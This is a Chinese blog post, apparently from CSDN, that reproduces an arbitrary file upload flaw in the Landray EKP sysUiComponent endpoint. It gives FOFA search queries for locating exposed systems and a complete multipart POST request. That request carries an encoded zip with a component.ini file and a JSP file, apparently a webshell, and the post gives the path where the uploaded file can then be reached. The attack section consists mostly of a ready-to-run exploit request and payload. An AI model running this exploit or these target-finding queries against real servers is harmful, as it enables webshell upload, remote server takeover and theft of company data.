蓝凌 EKP sysUiComponent任意文件上传

文章描述了一个蓝凌ekp系统中的sysUiComponent文件存在的任意文件上传漏洞,攻击者可通过此漏洞上传webshell,威胁企业数据安全。文章提供了漏洞的复现步骤和受影响的版本信息。
摘要由CSDN通过智能技术生成

漏洞描述

该系统 sysUiComponent 文件存在任意文件上传漏洞,通过此漏洞攻击者可上传webshell木马,远程控制服务器,威胁企业数据安全。

影响版本

蓝凌ekp

网络空间测绘

fofa:icon_hash=“831854882”
fofa:app=“Landray-OA系统”
在这里插入图片描述

复现


访问地址看到如下页面代表可能存在漏洞
http://your-ip/sys/ui/sys_ui_component/sysUiComponent.do?method=upload
image.png
构造恶意压缩包(共两个文件,component.ini和上传的文件)
添加后缀为.ini文件内容,id值为上传后路径,name值为上传的文件名

id=2023
name=test.jsp

image.png
image.png

POST /sys/ui/sys_ui_component/sysUiComponent.do?method=getThemeInfo&s_ajax=true HTTP/1.1
Host: {{hostname}}
Referer: http://your-ip/sys/ui/sys_ui_component/sysUiComponent.do?method=upload
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Content-Type: multipart/form-data; boundary=---------------------------464806649190648233951964219
Cookie: your-Cookie
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://your-ip
Accept: application/json, text/javascript, */*; q=0.01

Content-Length: 1722-----------------------------464806649190648233951964219
Content-Disposition: form-data; name="file"; filename="a.zip"
Content-Type: application/x-zip-compressed
        
{{unquote("PK\x03\x04\x0a\x00\x00\x00\x00\x00\xe9\x94pW\xfe\xb0\xa6\xc5\x13\x00\x00\x00\x13\x00\x00\x00\x0d\x00\x00\x00component.iniid=2023\x0d\x0aname=a.jspPK\x03\x04\x14\x00\x00\x00\x08\x00J\x97pWi\x09\xca\x06\xbd\x00\x00\x00!\x01\x00\x00\x05\x00\x00\x00a.jspu\xcdM\x0f\xc1@\x10\x06\xe0\xbf26i2\x7b\xb0\x14\x07I\xb5w7\xe1\x28\x0e[F\xad\xb4\xab\xd6T\x89\xf8\xefv\x83\xe0\xe04\x1fy\xe7\x99I\x04f\x8b\"\x1e\x0c\x85\xa2c\xa3\xcb\x13:_\xe9\xc4\xaa \x9ei\xa7+br\x28\xeav#\xa4\x947\xd8\xeb\xb3V\xe6\xa0\xa6\xb6nx\xc1\x8et\x05\xc6B\x0a\xf3\xc6\xb2\xa9\x28\xdc\xbdZ\x94\x8a.\xb4\xfe#\xae\xab \x86\xe5\x17\x852\xf1\x1a\x83\xf6`7N \xbf2-W\x90\xfb\xd1R\xfb\x1c\x07\xfd\xd1x\x95\xc0\xa1aU;\x1fF1\xa9\x1de\xc2\x9f\xb6;S\x12\xa2N\x8dU\x9e\xdb`.e'\xed\xc6\xf2\xf6\x89\x97\x16\x03\xe5\xff\x19[\x84@\x02\xf7\x1f\xac\xf7\xd6\xee\x10e\x0fPK\x01\x02\x1f\x00\x0a\x00\x00\x00\x00\x00\xe9\x94pW\xfe\xb0\xa6\xc5\x13\x00\x00\x00\x13\x00\x00\x00\x0d\x00$\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00component.ini\x0a\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\xac\xd0\xb4'y\x18\xda\x01C\x8dP\x28y\x18\xda\x01\xe9\xcc\xbf\x14y\x18\xda\x01PK\x01\x02\x1f\x00\x14\x00\x00\x00\x08\x00J\x97pWi\x09\xca\x06\xbd\x00\x00\x00!\x01\x00\x00\x05\x00$\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00>\x00\x00\x00a.jsp\x0a\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00<4\x17\xd0\x7b\x18\xda\x01<4\x17\xd0\x7b\x18\xda\x01\x03,\xea\x14\x7b\x18\xda\x01PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xb6\x00\x00\x00\x1e\x01\x00\x00\x00\x00")}}
-----------------------------464806649190648233951964219--

http://x.x.x.x/resource/ui-component/2023/test.jsp

image.png
image.png

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值